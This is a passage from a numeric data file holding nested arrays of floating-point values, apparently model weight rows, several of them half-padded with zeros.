-0.192767, 0.0232578, -0.873312, 0.0125965, 0.202984, 0.0939274, -0.233993, -0.10274, 0.158707, 0.537479, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.779768, 0.00460521, -0.107788, 0.413416, 0.0950057, -0.56679, -0.00879277, -0.0498294, -0.150367, -0.320293, -0.0391555, -0.271165, -0.321204, 0.352898, 0.256446, -0.0161893, -0.361139, 0.337897, -0.26479, -0.299872, -0.0254086, -0.254315, 0.155235, -0.0992112, -0.0136903, -0.000655971, 0.07623, -0.070323, -0.285394, -0.0773502, 0.287147, 0.224083, -0.136703, 0.0887629, -0.475407, -0.398168, 0.108211, -0.00939561, 0.636019, -0.467488, 0.0203305, -0.101326, 0.497173, 0.000305703, 0.253283, 0.352609, 0.1912, -0.0233907, -0.0936437, 0.00376748, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.907045, -0.0200609, -0.0542313, 0.256682, -0.273609, -0.0816323, -0.0819423, -0.66743, 0.0648148, -0.371169, -0.0207716, 0.544816, -0.0402844, 0.0818872, 0.244291, 0.92637, 0.000680757, -0.0576869, 0.0118569, -0.0363323, 0.267232, 0.437904, -0.364664, -0.808204, 0.00593985, -0.0288534, 0.450273, 0.451901, 0.604125, -0.323262, 0.0928226, -0.742443, -0.245976, -0.298309, 0.228993, -0.073449, 0.104942, -0.0241614, 0.778216, 0.568608, 0.0823384, 0.262053, 0.0433182, 0.0543064, 0.0359142, 0.249233, -0.658138, -1.19324, 0.0658258, -0.173405, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0553672, 0.00976905, -0.971502, 
-0.358402, -1.04272, 0.610096, -0.256809, 0.0651194, -0.662467, -0.146877, 0.0258337, -0.334675, -2.20834, -0.259262, 0.93166, 0.45333, -0.70427, 0.786025, -0.535643, -0.215562, 0.847485, 0.445442, 0.455008, 0.43554, -0.0180971, -0.0226917, -0.441285, 0.209312, -0.183792, -0.332497, 1.4979, -0.423652, -14.697, -0.344224, 0.502204, 1.06786, 1.1077, -0.0281584, 0.192195, 1.00017, -0.255278, 0.759057, 0.922768, -0.0367276, 1.12207, -1.31168, -0.471507, -4.65215, 0.0272306, -0.685682, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.234, 0.0293159, 0.332882, 1.24706, -0.773563, 0.116577, -0.572868, 0.259173, -0.337544, 0.159413, 0.00236097, 0.0541645, -0.939995, 0.0436153, 0.454926, 0.335852, 1.42115, -0.36064, 0.146185, -0.0522267, -0.0931296, 0.594653, 0.274627, 0.0927465, 0.0161132, 0.0332546, -0.402924, 0.0338912, 0.187877, -0.404615, 0.0159843, 0.541749, 0.492309, 0.404674, -0.569183, -0.44226, 0.178113, -0.0111348, -0.223976, -0.108061, 0.367642, -1.31615, 0.406011, 0.0156123, 0.227071, -0.519789, -0.513706, 0.462135, 0.0778425, 0.0773384, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.862983, -0.0467611, 0.20696, 0.434222, 0.576017, 1.14255, 0.0566379, -0.636594, 0.0501918, -0.328482, 0.00689944, -0.340273, 0.206483, -0.112446, 0.431302, -0.0805058, 0.0644224, 0.803858, -0.145712, -0.586431, -0.00612225, 0.876199, 0.355141, -0.0433557, -0.0426076, -0.0298103, 0.804772, -0.429625, 0.144828, -0.550955, -0.246674, -0.344367, 0.0142266, 0.0930318, -0.247999, 0.0288773, 0.705361, -0.00428293, 1.87929, -0.13086, -0.034243, 0.0676066, 0.335097, 0.065325, 0.223728, 
0.237086, -0.132441, 0.147274, 0.0666699, -0.0768807, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.136454, -0.0301639, 0.211548, 0.400702, -0.163457, -0.102936, -0.0172071, -0.143847, -0.154709, -0.205657, 0.00562801, -0.110026, -0.670649, -0.270103, 0.220789, 0.0869835, -0.389593, -0.134786, 0.0678404, -0.438653, 0.41681, -0.193901, 0.046517, 0.416242, -0.0324072, 0.0417997, 0.725792, 0.0616304, -0.289006, -0.133309, 0.00232118, 1.00188, -0.174772, 0.333639, -0.61906, -0.256912, 0.178977, -0.00362103, 3.48713, 0.171989, 0.00439339, -0.217781, 0.0994489, 0.0242226, 0.172693, 0.564508, 0.591217, -0.821346, -0.219971, 0.143907, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.367219, -0.0147802, 0.248119, -1.60884, 0.381106, 1.10237, -0.312325, 0.509428, 0.214846, -1.41547, -0.0317061, -1.08086, 0.65774, 0.243525, 0.0280457, 0.0785658, 1.2539, -0.205988, 0.00934208, 0.13474, -0.699491, -0.329449, -0.610931, -0.375192, 0.0242696, 0.0322354, 1.14848, -0.439431, -0.266475, 0.411069, 0.1225, 1.74076, -0.384156, 0.0558477, 0.826983, -0.278778, 0.42681, 0.0166626, 1.57558, 0.438477, -0.0420085, 1.06259, 0.565576, 0.0156828, -0.725162, 0.468068, 0.455621, 0.718144, -0.00530784, -0.0925064, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.257706, -0.0331422, 0.276224, 1.37799, -0.825, -0.598808, 0.668442, -0.20559, 0.0580261, 0.30588, -0.0150193, 0.232805, 0.903098, 
0.831136, 1.00353, 0.78575, 0.189079, 0.3155, 1.52567, 0.85269, 0.740944, 1.60904, 0.523976, -0.0523105, 0.00529722, -0.0198361, -0.922446, -0.53231, 0.382764, 0.0887215, 0.328277, 0.925958, 0.345025, -0.0630245, 0.257892, -0.363016, 0.749874, -0.0406652, 0.135525, -0.140709, 0.979396, -0.0623986, 0.0922492, -0.0133643, -0.128191, -0.180386, 0.129015, 2.605, -0.299233, -0.800569, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.577885, 0.0215591, 0.148933, -0.170277, -0.386151, 0.0342367, -0.208452, -1.46794, 0.398508, 0.165686, -0.0308293, 0.184304, 0.0772126, 0.158258, -0.396262, 1.24672, -0.0669484, 0.162623, 0.321119, -0.127742, 0.315959, 0.398816, 0.357758, -0.563836, 0.0403536, 0.0251802, 0.0577722, 0.111992, 0.171346, -0.0805749, 0.262344, -1.81049, -0.111044, -0.341043, -0.479481, 0.121563, 0.0885163, -0.0233549, 0.281266, 1.53269, 0.234276, -0.28006, 0.161315, 0.0354072, 0.573879, -0.42122, -0.325846, 0.25698, -0.0852825, -0.21047, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.352779, 0.0373517, 0.449918, 0.275572, -0.089783, -0.186809, -0.119094, -0.899151, -0.242046, -0.229647, 0.0432978, -0.260913, 0.610268, 1.38198, 0.217736, -0.281995, 0.549524, 0.611103, 0.110584, 0.167533, 1.25721, 0.384696, -0.663257, 0.964344, 0.042178, 0.0371448, -1.08815, -0.435193, 0.96901, -0.152442, -0.344656, 1.06736, 0.422155, 0.620929, -0.307627, 0.781426, -0.510016, 0.0378419, 0.119682, -0.160629, 0.320461, -0.111042, 0.165071, -0.0413847, -0.4892, -0.00255905, -0.126075, -0.320052, -0.272004, -0.339264, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.751743, 0.00802776, 0.127171, 0.764413, -0.649843, 0.427717, -0.282083, 0.242726, 0.050959, -0.374061, 0.00308597, 0.327112, 0.50696, -0.123995, -0.781009, 0.604333, -0.148293, -0.423364, 0.218764, -0.20953, 0.219464, 0.437041, 0.390218, 0.364812, 0.037837, 0.0406732, 0.325407, 0.197235, 0.122919, 0.228857, 0.386305, 0.345948, -0.460632, 0.209441, -0.454688, -0.767626, -0.433038, 0.028578, -1.8701, -0.0743135, -0.641173, -0.244149, 0.549823, 0.0387929, 0.0478138, 0.77757, -0.511342, -0.163986, 0.231896, 0.0773283, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.405981, -0.0171778, -0.34864, -2.74881, -1.24885, 0.914388, -0.134013, -0.0336847, -0.0268316, 0.562683, 0.00619498, -0.244515, -0.784575, 0.147544, -0.0553004, -0.557527, -1.17063, -0.308496, -0.31581, 0.154522, 0.228761, 0.611872, -0.0536644, 0.0151532, -0.0205841, 0.0141396, 0.223693, -0.621742, 0.612758, 0.011576, -0.204615, -4.61737, 0.388798, 0.205391, -0.335703, -0.146788, -0.35623, -0.016443, 0.455901, -0.0345588, 0.291943, 1.44346, 0.436454, 0.0537305, 0.445731, -1.62904, -0.31125, -0.106973, 0.211625, 0.330819, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.1486, -0.0281092, -0.316401, -1.1296, 0.826642, 0.382134, 0.68813, -0.163025, -0.0557976, 0.138514, -0.0365683, 0.0973853, -1.44558, 0.224838, -0.099961, 0.14668, -0.24979, 1.767, -0.578091, -0.0817435, -1.26794, -0.623008, -0.0335716, -0.0408247, 
-0.00688724, -0.0375689, 0.811307, 0.0922394, 0.199597, 0.0214643, -0.596357, -4.92639, 0.109188, -0.411938, 0.512725, 0.444544, 0.288814, -0.0439124, 0.96321, -0.111357, -0.0409851, -0.0428231, 0.448917, 0.0214068, 0.134141, -0.0421486, 0.73962, -0.625875, -0.189217, 0.0109901, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.46934, -0.041374, 0.275, -0.00619663, 2.3813, 0.715543, -0.272463, -0.00430873, 1.25947, 0.0337887, -0.0180364, -0.695254, -1.25222, 0.500506, 0.387588, 0.332265, -0.616884, 0.397569, 0.471094, -0.217455, 0.802973, -0.719571, 1.03382, -0.186794, -0.0430558, -0.0208258, -0.608952, 0.537565, 1.04086, 0.161572, 0.970269, -0.257122, -0.585654, -0.350263, -0.828426, -0.138084, 0.137207, 0.00766544, 0.3084, 0.00127726, 0.211288, -0.312649, -0.0786458, 0.0621266, 0.236371, -0.310552, -0.771824, 0.489374, -0.0774861, 0.216944, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.277425, 0.010897, -0.0576476, -0.426415, -1.02631, -0.44816, -0.181656, -0.124534, 0.0119235, 0.146823, 0.0200086, 0.107208, 0.480191, -0.122292, -0.352585, 0.426267, -0.323987, 0.0817028, 0.0816936, -0.0287567, 0.382427, 0.911346, 0.105378, 0.827236, -0.0239208, -0.0380447, 0.222424, -0.474559, 0.012434, 0.108757, -0.195532, -0.439178, -0.223122, 0.454058, -0.126136, -0.402087, 0.513452, 0.0314696, -2.08173, 0.525546, -0.0219227, -0.209821, 0.340916, 0.00944964, -0.252425, -0.403715, -0.131234, 0.0523331, -0.390229, 0.88913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.92611, -0.0127626, 0.330936, -0.456887, 1.56485, 0.952867, -0.180495, -2.42666, -1.14075, 0.556439, 0.0297273, -0.545335, -3.0313, -0.355863, 0.132186, 0.0960997, 0.317961, 1.31321, 0.668503, -2.45106, -0.603412, 1.20234, 0.471963, 0.737565, -0.0248176, 0.0254776, -0.0570893, -0.364992, -0.414172, -0.021231, -0.363983, -1.14991, 0.994633, 0.267449, 0.506773, 0.422117, 0.200082, -0.0454036, -1.39989, -0.255192, -0.952639, 0.363158, 0.279913, 0.0691381, -0.147051, -0.662875, 1.07298, 1.04943, 0.565965, -0.3343, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0470127, 0.0260384, -0.00239061, -0.0356783, -0.0238743, 0.00564661, -0.0105979, -0.0211757, -0.00674181, 0.00682966, -0.00395341, -0.0108038, 0.0222569, 0.045825, 0.0104983, 0.00663437, 0.0202816, 0.032412, 0.00516674, -0.0433068, -0.0240783, -0.0421443, 0.0165029, -0.0199256, 0.0316068, -0.0180217, -0.0200766, 0.000777581, -0.0275547, -0.0455195, 0.0180881, 0.00111859, -0.015961, -0.0327818, -0.0462522, -0.0155022, -0.0133376, 0.0358468, -0.00170342, -0.013131, -0.0275671, -0.0443745, -0.00783186, 0.0360081, -0.001357, -0.04414, 0.00990426, 0.0245569, -0.00276082, -0.00687225, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.14982, 0.00800037, -0.0243698, 0.482854, 0.609077, -0.386207, -0.00780233, 0.701715, -0.0143196, -0.287645, 0.0593701, -0.326503, 0.0489246, 0.401491, -0.190081, 0.130831, 0.582395, 0.727206, -0.272989, 0.336276, -1.02791, -0.0193169, 0.0137146, 0.0553962, 0.0314208, -0.0437471, 
-1.05749, 0.206949, 0.162541, -0.0656043, -0.108613, 1.37692, 0.0750832, 0.0887287, -0.183961, -0.333367, 0.24798, 0.0284351, -0.389784, 0.31424, -0.477889, -0.14148, -0.768716, 0.0153934, -0.0361928, 0.0499979, 0.0951208, -1.17371, 0.414968, 0.732138, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.684643, 0.0266207, -0.0270434, -0.49358, 0.0854302, 0.198905, 1.14418, 0.0207908, 0.31771, -0.220484, -0.0348167, -0.114956, 0.0335976, 0.162506, 0.163331, -0.00662378, -0.398837, -0.396104, -0.377506, -0.232625, 0.0943345, 0.191123, 0.168899, 0.0292205, -0.0341844, -0.0330708, -0.0247395, -0.955125, 0.265533, 0.091987, -0.0690644, -0.137127, -0.0986899, 0.303722, -0.207898, -0.218725, 0.152049, 0.0373919, -5.27501, 0.319976, -0.0159305, -0.418828, -0.0451054, 0.0197838, 0.448791, -0.0443644, 0.337174, -0.064733, -0.186417, 1.32784, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1461, -0.00549, 0.794, 1.309, 0.2241, -1.364, -0.1096, 0.8984, 0.31, 0.006824, -0.00362, 0.1498, -0.2351, 0.1578, -0.001781, 0.4846, 0.3237, -0.598, -0.4915, 0.3245, -0.6685, 0.305, 0.419, 0.2988, 0.0235, 0.005497, -0.1794, -1.504, 0.0308, 0.3376, 0.3408, 1.647, 0.015045, 0.339, 0.3955, -0.785, -0.6333, -0.03845, -3.225, 0.6245, -0.8804, -1.005, -0.5205, 0.03336, 0.4966, 0.1138, -1.116, -1.156, 0.515, -0.1326], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.159, -0.00828, -0.4788, -0.485, 1.436, 1.089, 0.3484, -4.844, 0.04272, 0.3704, -0.01927, -0.674, 0.1608, 0.6504, 0.8564, 0.03717, 0.02559, -0.263, -1.085, -0.363, -1.621, -0.789, 0.374, -0.979, 0.0276, 0.03137, 0.5366, -1.149, -0.09406, -0.03333, -0.2578, 1.97, 0.05014, 0.07336, -0.866, 0.78, 0.7603, -0.02176, -2.004, -0.801, 0.2144, 1.155, -0.968, 0.02542, 0.1581, -0.1842, -0.05933, -2.332, -0.518, -0.3176], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.016, 0.02824, 0.1119, -0.524, 0.373, -0.01156, -0.11694, -0.787, -0.1544, 0.0679, -0.00353, 0.264, -0.0961, 0.545, 0.1487, 0.1159, -0.04904, -0.647, 0.8013, -0.10297, 0.648, 0.2106, 0.01344, 0.07184, 0.042, -0.002863, -1.888, -0.5093, 0.396, 0.2351, -0.2343, -0.5947, -0.08887, 0.663, -0.1105, -0.634, -0.7407, 0.0317, 0.1295, 0.3613, -0.10077, -0.503, -0.1974, 0.001014, 0.2363, 0.313, -0.3518, 0.07697, -0.49, -0.3052], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1715, 0.02829, 0.004772, 0.02516, 0.5625, -0.0817, 1.075, -0.1493, 0.3333, -0.2676, 0.0251, 0.0682, -0.0694, 0.3542, -0.1327, 0.1935, 0.0164, -0.2627, 0.4277, -0.2747, -0.5264, 0.3694, 0.2878, -0.1813, -0.02814, -0.0031, 0.0812, 0.771, 0.2673, -0.1777, 0.151, -0.6836, 0.348, 0.675, 1.043, -0.03564, 0.2542, -0.04004, 1.77, 0.2317, -0.02733, 0.11664, 0.3762, 0.03955, 0.362, -0.1356, 0.1869, -0.3638, -0.1929, -0.3042], [0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9556, 0.02544, 1.028, -0.3713, 0.3743, -0.4673, -0.3567, -0.02646, -0.1617, 0.501, 0.0512, -0.1328, -0.7266, -0.694, 0.7695, -0.0407, 0.02519, 0.009796, -0.532, -0.258, -1.663, -1.154, 0.1958, -0.4426, 0.04144, 0.04968, 0.9683, -0.82, -0.5156, 0.5034, 0.534, -1.932, 0.547, 0.2175, 0.01596, 0.6953, -0.4294, 0.04477, -0.0976, 0.3801, 0.02745, -0.8086, 1.048, -0.00531, 0.2722, 0.818, 0.977, 0.1377, -0.636, -0.502], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.208, -0.03038, 0.4368, 0.3352, -0.1735, 0.411, 0.3699, -0.309, -0.3606, -0.05246, 0.01125, -0.7915, 0.6357, -0.7334, 1.065, 1.068, -0.283, 1.871, -1.049, 0.504, -0.294, 0.1904, 0.713, 0.01267, 0.01167, -0.007027, 0.2249, -0.9043, -0.626, -0.1437, -0.1473, 1.068, 0.557, -0.2146, 0.1357, -2.62, 0.1184, 0.01459, 1.4795, 0.5654, 0.4502, -0.972, 0.7017, -0.001569, 0.547, 0.4846, -0.69, -0.5923, 0.1404, -0.636], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4229, 0.0222, 0.3389, 1.276, -0.9927, 1.861, -0.2554, 0.2352, -0.6445, -0.2289, -0.0086, 0.4949, 0.7124, -0.02165, 0.1733, 0.4412, -0.4126, 1.116, -0.8423, 0.4966, -0.657, 0.2178, -5.258, 0.05853, 0.0365, -0.012764, -0.519, -0.1132, 0.204, -0.5073, 1.0, 0.459, -0.3516, -0.2374, -0.216, -0.4568, 0.2795, -0.01877, -0.069, -0.472, -0.41, 0.45, -0.3025, -0.04752, -0.7124, 0.1103, -1.632, 0.1511, 0.741, -0.1305], [0.0, 0.0, 0.0, 
